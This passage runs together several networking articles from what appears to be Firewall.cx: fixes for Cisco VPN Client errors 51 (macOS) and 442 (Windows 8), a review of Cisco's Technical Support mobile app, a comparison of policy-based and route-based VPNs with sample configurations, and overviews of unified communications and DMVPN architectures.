$ sudo /System/Library/StartupItems/CiscoVPN/CiscoVPN restart

For newer OS versions:
 
$ sudo kextload /System/Library/Extensions/CiscoVPN.kext

The above command(s) require administrator rights, so the system might ask for the administrator password as shown below:

cisco-vpn-mac-error-51-2

 Another command that can be used to re-initialize the Cisco VPN subsystem is the following:

$ sudo SystemStarter restart CiscoVPN

Again, the administrator password might be required.

Should the Error 51 problem occur again, simply apply the same command that worked for you previously and you’ll be ready to connect to your VPN. It might also be a good idea to create a small script with the above commands so it can be executed every time the error occurs.
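As an illustration, such a script could look like the minimal sketch below (the filename is arbitrary; keep whichever of the two commands applies to your OS X version):

#!/bin/sh
# Re-initialize the Cisco VPN subsystem after Error 51.
# Try the StartupItems method first (older OS X); fall back to reloading the kext (newer OS X).
sudo /System/Library/StartupItems/CiscoVPN/CiscoVPN restart 2>/dev/null || \
sudo kextload /System/Library/Extensions/CiscoVPN.kext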

Windows 7/8 users experiencing the Cisco VPN Client Error 442 on their system can also visit our Cisco Services & Technologies section to read how to correct the problem.


Introducing The Cisco Technical Support Mobile App (Apple iOS, Android Smartphones). Open, Monitor & Manage TAC Cases, RMAs, Products, Podcasts & More!

By: Arani Mukherjee & Chris Partsenidis

review-100-percent-badge

For a successful networking professional it is essential to gain information on-the-fly about the network infrastructure he or she is working on. For a successful and established vendor of networking equipment and technology it is important to satisfy this requirement. Being at the forefront of networking technology, Cisco carries the enviable distinction of not only setting industry standards and delivering a variety of networking equipment, but also presenting an efficient support infrastructure. One such service offering is its latest Cisco Technical Support Mobile App.

As handheld devices are rapidly becoming the norm, the Cisco Support mobile app delivers a strong support base for networking professionals. Firewall.cx will now present a broad-spectrum analysis of this application, discussing its salient features and showcasing its merits.

For the purpose of this exercise the Android platform has been used. However, the app is available for other platforms such as iOS and BB10.

cisco-support-app-0

Key Features

The Cisco Technical Support mobile app has a multifunctional element, synonymous with all Cisco products. Here we look into the key features, which are as follows:

  • Opening and Managing Support Cases and RMAs with Cisco
  • Cisco Support Community Activities
  • Video Feeds
  • News Feeds (Cisco Blogs)
  • Podcasts
  • Cisco Product Information

Please note that this review is being done on the app itself, venturing into its ease of use, robustness and overall functionality.

User Experience

Simplicity has always been the hallmark of a Cisco product; this mobile application shares this key value. The user experience is enhanced by the fact that the app delivers a robust support infrastructure without complicating the extraction of information.

Before obtaining access to the services and information the app provides, each user is requested to login to their Cisco CCO account as shown below:

cisco-support-app-1

 Once logged in, the user is presented with the Home screen menu, which clearly shows what the application has to offer:

cisco-support-app-1a

As depicted in the screenshot, it is evident that form has followed function. This high-impact home screen layout clearly shows the services Cisco Technical Support Mobile App has to offer.

Each section has its own subsection, which has a strict hierarchy. This allows the user to navigate through the various subsections without losing context.

Support Cases

The Cisco Support Cases section is one of the application’s strongest and most popular areas; it allows the user to open and fully manage Cisco support cases. The process of opening a support case is identical to that of the Cisco Support Website.

Users with existing cases in their CCO account will find they can continue working on their cases through the application. The app automatically syncs with the user’s CCO profile, allowing users to access their Cisco support cases without requiring a laptop or being at the office. The only requirement is Internet access on their mobile device.

The Support Cases section presents four options, allowing the user to:

  • Use My Open Cases to view and manage support cases
  • Create a Watch List (useful to ‘bookmark’ important cases)
  • Search Cases
  • Open New Cases (and issue RMAs)

cisco-support-app-3a

The My Open Cases menu allows users to fully manage all existing open cases. From here,  users can view cases and communications with Cisco TAC, update cases with new information, request the closure of cases and much more.

When working on multiple TAC cases it can be difficult to keep track of the most important ones. This is where the My Watch List menu option comes in handy: it allows the user to add cases to his/her Watch List, and keep track of them, without searching through the My Open Cases section.

The Search Cases menu option allows users to search through all open TAC cases for specific keywords. The search can be based on Title, Description, Case Number, Case Owner ID or Service Contract Number.

The last menu option, Open New Case, allows the user to open a new case with Cisco TAC.

Support Cases: Diving Into ‘My Open Cases’

Let’s look at how to fully manage Cisco TAC support cases using the Cisco Technical Support  app.

By selecting My Open Cases users are presented with all open support cases, which are categorized by Customer Pending and Cisco Pending status. Notice how the application shows the number of open cases in the tab of each category:

cisco-support-app-4

Selecting either of the two tabs (Customer/Cisco Pending), the application will list the cases and the following important information: Severity (automatically highlighted in the application), Service Request Number, Case Title, Last Update Date and Case Owner.

Users running the app under the Android platform can use the refresh button (lower left corner) to force the application to update – sync with the Cisco Support website.  We should note that the iOS client uses "tug to refresh" instead. 

The refresh feature comes in handy while monitoring cases where the user is expecting updates by Cisco TAC or one of their colleagues handling the cases with Cisco. For the user’s convenience, the application shows when it was last updated with the Cisco Support website. 

The user can tap on any open case to view more details and manage it. For example, we tapped on the second listed case while in the Cisco Pending tab (Case 626926599) to view further details:

cisco-support-app-5

As shown in the screenshot above, the user is able to view the Date Created, the Cisco TAC Engineer assigned to the case, the Tracking Number and RMA-related information (used only in the case of an RMA), along with the Previous Notes (communication history for this case) and case Attachments (files that have been attached to the case).

Getting in contact with the Cisco TAC engineer handling the case is as easy as tapping on the Contact TAC Engineer option. This will open the Contact Option popup window and ask the user for the preferred contact method: Email or Call the Engineer:

cisco-support-app-7

Selecting Email will launch the preferred email client and automatically enter the Cisco TAC Engineer’s email address and Case number as the subject. Selecting Call TAC Engineer will bring up the engineer’s direct phone number.

Returning back to our case screen and selecting the Previous Notes option reveals all of the communication history with Cisco TAC. This feature is ideal for IT Managers monitoring cases, to get up to speed on what actions have been taken so far:

cisco-support-app-6

 From here, we can read an individual email/note by simply tapping on top of it to select it.

Additional Support Case Management

While inside a Cisco Support Case the user can select additional actions by selecting the left menu button which will reveal the following: Add Note, Request Status Update, Add to Watch List, Attach Photo, Request Case Closure and Logout:

cisco-support-app-8

Selecting Add Note is similar to replying to an email thread of the case. Once selected, we can add a title and note which can then be submitted. The system will then automatically update the case and the engineer will be notified that an update has been made by the customer.

Support Cases: Watch Lists & Searching Cases

My Watch List

Returning to the main Support Cases menu, users can visit the My Watch List area. Here they can keep track of any cases that have been added to the Watch List:

cisco-support-app-9

Users who haven’t used this feature won’t find any cases listed in it. However, as noted previously, pressing the left menu button while viewing a case allows it to be added to the Watch List for future reference, as shown in the two screenshots below:

cisco-support-app-10

After adding the necessary support cases to the Watch List, users can view and manage them directly from My Watch List, as shown below:

cisco-support-app-11

Searching Cases

The ability to search cases allows the user to quickly search and locate a specific open case, based on the available search options:

cisco-support-app-12

To begin searching, select the Search Option (by default Title or Description contains is selected), type in a search keyword and select the large green Search button at the bottom of the screen.

After the Search button is pressed, the application will send the request to the Cisco Support Website  and return the results within a few seconds:

cisco-support-app-13

In our example we searched for the keyword ‘CME’ and it returned the Cisco case we were looking for. Once the search is complete select the case to enter and continue managing it.

Support Cases: Opening A New Case

Opening a support case with Cisco has always been an easy step-by-step process, especially through the new intuitive Cisco Support Website. The Cisco Technical Support mobile application brings the same ease to all mobile devices.

Through the Open New Case option the user is able to quickly open support cases and get a TAC Engineer to help resolve the problem. The experience is so impressive that we (Firewall.cx) decided to open a new case and then requested the TAC Engineer call us back so we could discuss our requirements. We tracked this whole case from our mobile phone, without the use of a PC, and we couldn’t think of any other vendor who would provide such a functional and smartly designed support environment.

When opening a new case, the user is presented with five easy steps before submitting the support case. These are:

  • Product Serial Number
  • Case Type (Severity Selection – ability to mark as urgent)
  • Select Product Type (Technology or product)
  • Select Problem Type (Configuration Assistance, Error Messages, Hardware failure etc.)
  • Case Title and Description

Every step, with the exception of Serial Number and Case Title / Description, consists of easy tap-and-select options that require minimal effort to complete.

When opening a new case, the first screen requests the product’s serial number. It is important to have the serial number of the product experiencing the problem. This will ensure that the application can continue to the next step. Once the correct serial number is entered tap Next:

cisco-support-app-14

Next, select the Case Type. If this is an urgent case, such as a network-down situation, it is imperative that the Extended Loss of Service option is also selected. This will help catch the immediate attention of the assigned Cisco TAC Engineer and in most cases results in a faster initial response. For this example we chose the first option by simply tapping on it, after which the check mark appeared as a visual confirmation of our selection:

cisco-support-app-15

We hit the Next button and then selected the technology and product in the two scrollable menu selections:

cisco-support-app-16

Selecting Next again takes the user to the next step where he/she is required to select the Problem Type:

cisco-support-app-17

There are five different problem types to select.  They cover possible problems that might arise, from simple configuration issues to hardware or software failures. Users selecting the Hardware Failure option will be taken down the RMA path to have their hardware replaced. In this example we selected Configuration Assistance and selected the NEXT button.

The final step requires the user to enter a short Case Title and a more detailed Case Description:

cisco-support-app-18

It is important to provide as much information as possible, in a well-structured manner. This will help the engineer assigned to the case understand the problem or requirement.

When complete, the application will present a final overview of the case before it is submitted into the queue for an engineer to be assigned to it. If incorrect details were accidentally entered and submitted, an update can be submitted through the case management with the necessary corrections:

cisco-support-app-19

After ensuring the details, notes and problem description are correct, select the Submit button. The case is then created and a confirmation window appears with the Support Case Number and options to View the Case or Email Case Information to a Manager, colleague or engineer:

cisco-support-app-20

Tapping the Done button will return the user to the main Support Case menu. Alternatively, selecting View Case will show the case details and allow the user to manage the newly opened case:

cisco-support-app-21

Notice that since this was a newly created TAC Case, no engineer has been assigned to it yet (TAC Engineer: NA). After a couple of minutes, the app shows the case was assigned to a Cisco TAC Engineer. Once the TAC Engineer was assigned, we created a new note (left menu button -> Add Note) requesting the engineer to call us so we can discuss the problem:

cisco-support-app-22

The TAC Engineer assigned to the case is able to view the owner’s details and obtain their contact information from there. If we were out of the office, we could provide our mobile number in the note. Shortly after submitting the note, we received the expected phone call from the Cisco TAC Engineer.

Summarizing the Support Case section of the Cisco Technical Support mobile application,  we believe it is an invaluable tool that helps IT Managers, Engineers and IT personnel keep on top of problems by managing Cisco Support Cases with ease and effectiveness, regardless of their location. We have not seen any similar products from other vendors, confirming once again how innovative Cisco’s Support Services and the Development team are.

Support Community

The Support Community Section is broken down into several subsections, each dealing with a different mode of support as shown in the following screenshot:

cisco-support-app-23

If the user prefers to go down the route of ‘Browse Community’ a plethora of options is presented. This enables the user to make very specific choices based on their most current need. The following screenshot shows the options:

cisco-support-app-24

Each individual subsection further expands into its own area to display further choices. Also worth mentioning is the fact that the Cisco Technical Support Mobile App has added support for several global communities, such as Japanese, Polish, Portuguese, Russian and Spanish.

A key element of an engineer’s understanding is being able to visualize the technology being described or demonstrated, and to be informed about the latest implementations. This is where the Videos section comes in very handy. This section contains a variety of information made available in video form. These videos range from Cisco Support Communities videos showcasing seminars, events and so on, to bulletins, webcasts and expert explanations.

The following screenshot shows video options available for a user to select from:

cisco-support-app-25

The last two sections in the Videos category are full of fundamental overviews and general networking topics like concepts and networking protocols.

Another feature is the Podcasts section. This category has two subsections: the Cyber Risks Report and the TAC Security Podcast. Selecting either of these subsections opens up the current topics covered within the podcast arena. This handy tool keeps users updated on current news and trends.

The next section we will cover is the RSS Feeds. This is a massive repository of blogs covering a wide range of topics segmented into three major labels: media, news and security. This enables the user to pick and choose which feeds are most relevant from his or her own perspective.

Last in this discussion, is the Products section. This covers all of Cisco’s offerings in terms of devices, tools, services, resources and trends. This is a virtual goldmine for anything and everything related to Cisco. The most brilliant part of this section is that the user can join a chat session (see screenshot) if there is a need for some instant assistance or information.

In this section you also have the option to send an email or request a price for any product. Additionally, once the chat session is started it continues to run in the background for easy access whenever the user chooses. Hence the ‘Continue Chat’ tab that appears, enabling the user to reengage the information interchange.

This screenshot shows the first page in the list of options on the Product Information page:

cisco-support-app-26

In this screenshot you can see the multiple options for communicating with Cisco:

cisco-support-app-27

This mobile application is a must have for every networking professional. It is a master of usability, simplicity and efficiency in delivering relevant information.

It has often been stated that the value of a tool is in its ability to reach the masses, and their recognition of its features. The Cisco Technical Support mobile application has won the 2013 American Business Award for Mobile On-Demand Application, 2012 Web Marketing Association Best Advocacy Mobile App, and 2012 Forrester Groundswell B2B Mobile App awards.

In closing, this application lives up to the expectations and scores on multiple grounds. Networking professionals will benefit from this immensely. Using this app will greatly enhance their own productivity and efficiency as well as help resolve issues and stay up to date on information, products and trends.

 


Comparing Cisco VPN Technologies – Policy Based vs Route Based VPNs

Virtual Private Networks constitute a hot topic in networking because they provide low cost and secure communications between sites (site-to-site VPNs) while improving productivity by extending corporate networks to remote users (remote access VPNs).

Cisco must be proud of its VPN solutions. It’s one of the few vendors that support such a wide range of VPN technologies with so many features and flexibility. Cisco Routers and Cisco ASA Firewalls are the two types of devices that are used most often to build Cisco Virtual Private Networks.  

In this article we will discuss and compare two general Cisco VPN categories that are utilized by network engineers to build the majority of VPN networks in today’s enterprise environments. These categories are “Policy Based VPNs” (or IPSEC VPNs) and “Route Based VPNs”. Of course Cisco supports additional VPN technologies such as SSL VPNs (Anyconnect SSL VPN, Clientless SSL VPN), Dynamic Multipoint VPN (DMVPN), Easy VPN, Group Encrypted Transport (GET) VPN etc. Many of these VPN technologies are already covered on Firewall.cx and are beyond the scope of this article.  


Overview Of Policy-Based & Route-Based Cisco VPNs

The diagram below shows a quick overview of the two VPN Categories we are going to discuss and their Practical Applications in actual networks:

cisco policy based and route based vpns

For a Network Engineer or Designer it’s important to know the main differences between these two VPN categories and their practical applications. Knowing these will help professionals choose the right VPN type for their company and customers.

As shown in the diagram above, Policy-Based VPNs are used to build Site-to-Site and Hub-and-Spoke VPN and also remote access VPNs using an IPSEC Client. On the other hand, Route-Based VPNs are used to build only Site-to-Site or Hub-and-Spoke VPN topologies.

Now let’s see a brief description of each VPN Type.

Policy-Based IPSEC VPN

This is the traditional IPSEC VPN type which is still widely used today. This VPN category is supported on both Cisco ASA Firewalls and Cisco IOS Routers. With this VPN type the device encrypts and encapsulates a subset of traffic flowing through an interface according to a defined policy (using an Access Control List). The IPSEC protocol is used for tunneling and for securing the communication flow. Since the traditional IPSEC VPN is standardized by IETF, it is supported by all networking vendors so you can use it to build VPNs between different vendor devices as well. 

Sample Configuration on Cisco ASA Firewalls

To illustrate the reason why this VPN type is called Policy-Based VPN, we will see a sample configuration code on a Cisco ASA firewall based on the diagram below.

cisco asa ipsec site to site vpn

Full step-by-step configuration instructions for Policy-Based VPN on IOS Routers can be found at our Configuring Site to Site IPSec VPN Tunnel Between Cisco Routers article.

ASA-1:

ASA-1(config)# access-list VPN-ACL extended permit ip 192.168.1.0 255.255.255.0 192.168.2.0 255.255.255.0
ASA-1(config)# crypto ipsec ikev1 transform-set TS esp-aes esp-md5-hmac
 
ASA-1(config)# crypto map VPNMAP 10 match address VPN-ACL
ASA-1(config)# crypto map VPNMAP 10 set peer 200.200.200.1
ASA-1(config)# crypto map VPNMAP 10 set ikev1 transform-set TS
ASA-1(config)# crypto map VPNMAP interface outside

ASA-2:

ASA-2(config)# access-list VPN-ACL extended permit ip 192.168.2.0 255.255.255.0 192.168.1.0 255.255.255.0
ASA-2(config)# crypto ipsec ikev1 transform-set TS esp-aes esp-md5-hmac

ASA-2(config)# crypto map VPNMAP 10 match address VPN-ACL
ASA-2(config)# crypto map VPNMAP 10 set peer 100.100.100.1
ASA-2(config)# crypto map VPNMAP 10 set ikev1 transform-set TS
ASA-2(config)# crypto map VPNMAP interface outside

From the configuration sample above, the access control list VPN-ACL defines the traffic flow that will pass through the VPN tunnel. Although there is other traffic flowing through the outside ASA interface, only traffic between LAN1 and LAN2 will pass through the VPN tunnel, according to the traffic policy dictated by VPN-ACL. That’s exactly why this VPN type is called a Policy-Based VPN.
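Keep in mind that a complete configuration also requires an IKEv1 policy, IKEv1 enabled on the outside interface and a tunnel-group holding the pre-shared key. Once both firewalls are configured and interesting traffic flows between LAN1 and LAN2, the tunnel status could be checked with commands along these lines (a sketch only; actual output will vary):

ASA-1# show crypto ikev1 sa
ASA-1# show crypto ipsec sa peer 200.200.200.1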

Understanding Route-Based VPNs

A route-based VPN configuration uses Layer3 routed tunnel interfaces as the endpoints of the VPN. Instead of selecting a subset of traffic to pass through the VPN tunnel using an Access List, all traffic passing through the special Layer3 tunnel interface is placed into the VPN. Therefore you need to configure routing accordingly. Either a dynamic routing protocol (such as EIGRP or OSPF) or static routing must be configured to divert VPN traffic through the special Layer3 tunnel interface.

This VPN type is supported only on Cisco Routers and is based on GRE or VTI Tunnel Interfaces. For secure communication, Route-Based VPNs also use the IPSEC protocol on top of the GRE or VTI tunnel to encrypt everything.

Sample Configuration on Cisco Routers

Based on the network diagram below, let’s see a GRE Route-Based VPN with IPSEC protection.

Full step-by-step configuration instructions for Route-Based VPN on IOS Routers can be found at our Configuring Point-to-Point GRE VPN Tunnels - Unprotected GRE & Protected GRE over IPSec Tunnels article.

Router-1:

crypto ipsec transform-set TS esp-3des esp-md5-hmac
crypto ipsec profile GRE-PROTECTION
  set transform-set TS
!
interface Tunnel0
 ip address 10.0.0.1 255.255.255.0
 tunnel source 20.20.20.2
 tunnel destination 30.30.30.2
 tunnel protection ipsec profile GRE-PROTECTION
!
ip route 192.168.2.0 255.255.255.0 10.0.0.2

From the configuration above, a GRE Layer3 Tunnel Interface is created (Tunnel0) which will be one of the endpoints of the VPN tunnel. IPSEC Protection is also applied for security. The other end of the VPN tunnel is Tunnel0 of the other site (with IP 10.0.0.2), thus forming a point-to-point VPN link. The static route shown above will divert VPN traffic destined for LAN2 via the Tunnel Interfaces.

Following are the VPN-related configuration commands for our second router:

Router-2:

crypto ipsec transform-set TS esp-3des esp-md5-hmac
crypto ipsec profile GRE-PROTECTION
  set transform-set TS
!
interface Tunnel0
 ip address 10.0.0.2 255.255.255.0
 tunnel source 30.30.30.2
 tunnel destination 20.20.20.2
 tunnel protection ipsec profile GRE-PROTECTION
!
ip route 192.168.1.0 255.255.255.0 10.0.0.1
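
Note that an ISAKMP policy and a pre-shared key are also required for the IPSEC protection to negotiate (covered in the step-by-step article linked above). Once both routers are configured, the tunnel and routing could be verified with commands along these lines (a sketch only; output will vary):

Router-1# show crypto session
Router-1# show interface Tunnel0
Router-1# show ip route 192.168.2.0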

Comparison Between Policy-Based & Route-Based VPNs

To summarize, let’s see a comparison table with the main differences between Policy-Based and Route-Based VPNs.

Policy-Based IPSEC VPN (Traditional IPSEC) vs Route-Based VPN (GRE and VTI):

  • Device support: Policy-Based is supported on most network devices (Cisco Routers, Cisco ASA, other vendors etc.), while Route-Based is supported only on Cisco IOS Routers, with very limited interoperability with other vendors.
  • Multicast & non-IP protocols: Policy-Based does not support multicast or non-IP protocols. Route-Based supports multicast (GRE and VTI) and non-IP protocols (GRE).
  • Routing protocols: Routing protocols (e.g. OSPF, EIGRP) cannot pass through a Policy-Based VPN tunnel but can pass through a Route-Based VPN tunnel.
  • Traffic selection: Policy-Based uses an access list to select which traffic is encrypted and placed in the VPN tunnel. With Route-Based, all traffic passing through a special Tunnel Interface is encapsulated and placed in the VPN.
  • Security: Policy-Based provides strong security natively. GRE or VTI alone do not provide security; you must combine them with IPSEC to secure the VPN.
  • Configuration: Policy-Based configuration is more complex, while Route-Based configuration is simpler.
  • QoS: Limited with Policy-Based; fully supported with Route-Based.

Summary

In this article we examined and compared the two Cisco VPN categories that are utilized by organizations: Policy-Based and Route-Based VPNs.

 

 


Unified Communications Components - Understanding Your True Unified Communications Needs

 What Is Unified Communications (UC)?

cisco-understanding-uc-needs-1

Unified communications is a very popular term these days, and we see it being used by almost every vendor as they rename their platforms and products to include the term. The definition of unified communications changes slightly depending on the vendor you are looking at, but its foundation remains the same. Breaking unified communications into components makes it a lot easier to analyze and put things into the correct perspective.

Unified Communications Foundational Components

These are, in essence, the main-core services a unified communications product should offer:

  • Network Infrastructure. Almost all unified communications services require a rock-solid network infrastructure. Without this foundation component we are unable to use all the features an advanced unified communications solution can offer.
  • IP telephony. Also known as Voice over IP (VoIP). This is a critical part of UC.
  • Presence. The ability to monitor the availability and state of another user: check whether the user's phone line is busy, or whether they are in a conference or away from their desk/office.

Unified Communications Basic Components

These are your everyday applications and services helping to unify your communications needs:

  • Email. The ability to send messages and attachments between colleagues and customers.
  • Messaging. Includes faxing, instant messaging services and voicemail.
  • Conferencing. Includes audio conferencing and Web conferencing services that tightly integrate with the UC infrastructure.

Unified Communications Emerging Components

These unified communications components are pretty much the most popular ones around today:

  • Mobility. Perhaps unified communications' greatest driving force. This component gives mobile workers corporate communications no matter where they are located.
  • Social Media. Many companies are using social media to help them reach out to millions of consumers at a fraction of the traditional marketing cost.
  • Videoconferencing. Mainly used by companies to reduce travel expenses and organize meetings.

Understanding Your True Unified Communications Needs

There is no doubt unified communications is not one product but a combination of complex technologies working together to meet your needs. A very common problem IT Managers and engineers face is understanding their company's needs when considering a unified communications solution.

Unfortunately, this process can be harder than it sounds, as there are a lot of parameters that are often not taken into consideration during the planning and decision-making process.

To help this process, we've outlined a number of points that require consideration and will help you reveal your true unified communications needs:

  • Return on investment (ROI). ROI is a key point to help you understand how your investment will help you save money, yet it can be difficult to measure. ROI must be calculated based on the unified communications solution being examined, the features it offers and how necessary they are for your organization. Don't focus entirely on the product's features but on your real needs today and tomorrow.
  • Unified communications is an evolving trend. Are you ready for the cloud? Many organizations are already migrating their unified communications services to the cloud, relieving them of the administration burden and management cost while providing a solid platform that can deliver very high uptime and ease of administration.
  • Future proof / Adapt to changes. This is where most unified communications solutions fall short. A unified communications solution should be able to adapt to company-wide changes and provide room for future growth. Examine your company's future plans and ensure the unified communications solution selected has the ability to support your growth plan and adapt to rapid changes.
  • Roll-out plan. Most unified communications solutions consist of core services that affect everyone in the organization during the rollout (installation) phase. In some cases, these installations can disrupt the company's normal workflow and therefore cannot be made during working hours. Rollout of these services must be planned with your integrator so that your workflow is not affected. Any serious integrator will have this in mind and present an acceptable rollout plan that will have minimum impact on the company's operation.

Cisco VPN Client & Windows 8 (32bit & 64bit) - Reason 442: Failed To Enable Virtual Adapter - How To Fix It

The Cisco VPN client is one of the most popular Cisco tools used by administrators, engineers and end-users to connect to their remote networks and access resources. This article shows how to fix the Cisco VPN Client Error Reason 442: Failed To Enable Virtual Adapter when trying to connect to a remote VPN Gateway or Router from the Windows 8 operating system (32bit and 64bit).

With the introduction of Windows 8, Cisco VPN users are faced with a problem – the Cisco VPN software installs correctly but fails to connect to any remote VPN network.

Windows 7 32bit & 64bit users dealing with the same problem can refer to our Troubleshooting Cisco VPN Client - How To Fix Reason 442: Failed to Enable Virtual Adapter article.

Windows 10 32bit & 64bit can read our article Install & Fix Cisco VPN Client on Windows 10 (32 & 64 Bit). Fix Reason 442: Failed to enable Virtual Adapter.

Windows 10 32bit & 64bit Anniversary Update 1607 users can read our Fix Cisco VPN Client Break After Windows 10 Anniversary Update 1607.

When trying to connect to a VPN network through a Windows 8 operating system (32 or 64 bit), the Cisco VPN client will fail to connect. As soon as the user double-clicks on the selected Connection Entry, the VPN client will begin its negotiation and request the username and password.

As soon as the credentials are provided, the VPN client shows the well-known “Securing communications channel” message at the bottom of the application window:

Cisco VPN Client on Windows 8 64 & 32 Bit

After a couple of seconds the Cisco VPN client will time out, fail and eventually terminate the connection. The user is then greeted by a pop-up window explaining that the VPN connection failed with a Reason 442: Failed to enable Virtual Adapter error:

Cisco vpn client Error 442 failed to enable virtual adaptor

Note: It’s always a great idea to have the latest Cisco VPN client installed. Users can download the Cisco VPN client for Windows, Linux and MacOS operating systems by visiting our Cisco Tools & Applications download section.

Introducing The Fix – Workaround

Thankfully the fix to this problem is simple and can be performed even by users with somewhat limited experience.

Here are 4 easy-to-follow steps to the solution:

1. Open your Windows Registry Editor by typing regedit in the Run prompt.

2. Browse to the Registry Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CVirtA

3. From the window on the right, select and right-click on DisplayName and choose Modify from the menu. Alternatively, double-click on DisplayName:

Cisco vpn client windows 8 registry

4. For Windows 8 32bit (x86) operating systems, change the value data from @oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter to Cisco Systems VPN Adapter.

For Windows 8 64bit (x64) operating systems, change the value data from @oem8.inf,%CVirtA_Desc%;Cisco Systems VPN Adapter for 64-bit Windows to Cisco Systems VPN Adapter for 64-bit Windows (shown below):

Cisco vpn client registry fix value data

When done editing the Value data, click on OK and close the Registry Editor.

You can now run the Cisco VPN Client and connect to your VPN network.  Changes performed do not require a system restart.


Comparing DMVPN Single Tier and Dual Tier Headend Architectures - IPSec VPN & mGRE Termination

This article extends our DMVPN article series by answering common questions regarding the differences between Single Tier Headend and Dual Tier Headend architectures.

When hearing the DMVPN terms single tier or dual tier it can be difficult to understand exactly their meanings.  While the difference between the two might seem clear when looking at a DMVPN with single or dual tier headend setup, what really goes on is usually not revealed or analysed in great depth, until now…

While there are plenty of diagrams online illustrating Single Tier and Dual Tier Headend architectures, we found none that would analyse the differences on a packet/protocol level. This is usually the level of analysis many engineers require to truly understand how each model works.

We always assume the DMVPN network (mGRE tunnel) is protected using the IPSecurity protocol.

Single Tier Headend

Single Tier Headend involves a DMVPN setup with one single Hub router responsible for all DMVPN services. Practically, this means both Crypto IPSec and mGRE tunnel terminate on the same router, the Hub.

This is illustrated in our detailed diagram below:

Cisco DMVPN single tier headend IP Sec Tunnel mode

In Single Tier Headend, IPSec runs in Tunnel Mode, encrypting the whole GRE tunnel and the data carried within. This ensures true confidentiality of our GRE tunnel and provides great flexibility in terms of VPN network design.

Engineers and Administrators who would like to learn more about protecting GRE using IPSec (both Tunnel and Transport Mode) can read our popular GRE over IPSec - Selecting and Configuring GRE IPSec Tunnel or Transport Mode article. We highly recommend the above article as it contains extremely useful information, not found easily!

As expected, a Single Tier Headend setup means that all processing is performed by one single device. The burden of encrypting, decrypting, encapsulating, decapsulating and maintaining the NHRP database falls on a single Hub. As a rule of thumb, the faster the Internet connection speed on the Hub router, the bigger the burden on its CPU, as it needs to process VPN data at a much faster rate. DMVPN scalability is a topic that will be covered on Firewall.cx.

DMVPN deployments based on Single Tier Headend architecture also support spoke-to-spoke VPN tunnels, allowing remote offices to dynamically build VPN tunnels between each other. Remote offices (spokes) are also configured with mGRE tunnels (like the Hub), allowing them to create the dynamic spoke-to-spoke tunnels.

Dual Tier Headend

Dual Tier Headend is a more popular approach to DMVPN, especially when it comes to VPN redundancy. Cisco usually uses this method when analysing DMVPN networks, however, this does not mean the Single Tier is not an acceptable solution.

With Dual Tier Headend Crypto IPSec terminates on a router positioned in front of the Hub, while the mGRE tunnel terminates on the Hub. This is illustrated in our detailed diagram below:

Cisco DMVPN Dual tier headend IP Sec Tunnel Mode

In Dual Tier Headend, IPSec runs in Tunnel Mode, encrypting the whole GRE tunnel and the data carried within. IPSec decryption occurs on R2, the Frontend router, and the mGRE tunnel is passed to the Hub where it terminates.

DMVPN deployments based on Dual Tier Headend architecture do not support spoke-to-spoke VPN tunnels. This limitation should be seriously considered if planning for this type of DMVPN deployment. This also explains why spoke routers in this deployment method are configured with single GRE tunnels (not mGRE).

Links To GRE - DMVPN - IPSec VPN Articles

Firewall.cx hosts a number of popular articles for those requiring additional information on DMVPN networks and IPSec VPNs. Below are a few hand-picked links to articles we are sure will be useful:

  1. Configuring Cisco SSL VPN AnyConnect (WebVPN) on Cisco IOS Routers
  2. Understanding VPN IPSec Tunnel Mode and IPSec Transport Mode - What's the Difference?

Dynamic Multipoint VPN (DMVPN) Deployment Models & Architectures

Following our successful article Understanding Cisco Dynamic Multipoint VPN - DMVPN, mGRE, NHRP, which serves as a brief introduction to the DMVPN concept and technologies used to achieve the flexibility DMVPNs provide, we thought it would be a great idea to expand a bit on the topic and show the most common DMVPN deployment models available today which include: Single DMVPN Network/Cloud  - Single Tier Headend Architecture, Single DMVPN Network/Cloud  - Dual Tier Headend Architecture, Dual DMVPN Network/Cloud – Single Tier Headend Architecture and Dual DMVPN Network/Cloud – Dual Tier Headend Architecture. This will provide an insight to engineers and IT Managers considering implementing a DMVPN network.

Those seeking help to configure a DMVPN network can also refer to our Configuring Cisco Dynamic Multipoint VPN (DMVPN) - Hub, Spokes , mGRE Protection and Routing - DMVPN Configuration article which fully covers the deployment and configuration of a Single DMVPN Network/Cloud  - Single Tier Headend Architecture.

DMVPN Deployment Models

There are a number of different ways an engineer can implement a DMVPN network. The fact that there is a variety of DMVPN models, each one with its own caveats and requirements, means that almost any VPN requirement can be met as long as we have the correct hardware, software license and knowledge to implement it.

Speaking of implementation, no matter how complex the DMVPN network might get, it’s pretty straightforward once it's broken down into sections.

Engineers already working with complex DMVPNs can appreciate this and see the simplicity in configuration they offer.  At the end, it’s all a matter of experience.

Providing configuration for each deployment model is out of this article’s scope, however, we will identify key services used in each deployment model along with their strong and weak points.

Future articles will cover configuration of all DMVPN deployment models presented here.

Following are the most popular DMVPN deployment models found in over 85% of DMVPN networks across the globe:

  • Single DMVPN Network/Cloud  - Single Tier Headend Architecture
  • Single DMVPN Network/Cloud  - Dual Tier Headend Architecture
  • Dual DMVPN Network/Cloud – Single Tier Headend Architecture
  • Dual DMVPN Network/Cloud – Dual Tier Headend Architecture

In every case a complete DMVPN deployment consists of the following services, also known as control planes:

  1. Dynamic Routing (Next Hop Resolution Protocol)
  2. mGRE Tunnels
  3. Tunnel Protection – IPSec Encryption that protects the GRE tunnel and data

It’s time now to take a look at each deployment model.

Single DMVPN Network/Cloud - Single Tier Headend Architecture

The Single DMVPN - Single Tier Headend deployment model is DMVPN in its simplest form.  It consists of the main Hub located at the headquarters and remote spokes spread amongst the remote offices.

Single DMVPN - single Tier Headend architecture

The term ‘Single DMVPN’ refers to the fact there is only one DMVPN network in this deployment.  This DMVPN network consists of the yellow GRE/IPSec Hub-and-Spoke tunnels terminating at the central Hub from one end and the remote spokes on the other end.

The term ‘Single Tier Headend’ means that all control planes are incorporated into a single router – the Hub. This means it takes care of the dynamic routing (NHRP), mGRE tunnels and IPSec Tunnel Protection.

The central hub maintains the Next Hop Resolution Protocol (NHRP) database and is aware of each spoke’s public IP address.

When setting up a DMVPN network, every spoke is configured, using static NHRP mappings, to register with the Hub. Through this process, every spoke can learn every other spoke's public IP address via the NHRP server (Hub), regardless of whether the spokes' IP addresses are dynamic or static.

Through DMVPN, each spoke is able to dynamically build a VPN tunnel to each other spoke, allowing the direct communication between them without needing to tunnel all traffic through the main Hub. This saves valuable bandwidth, time and money.

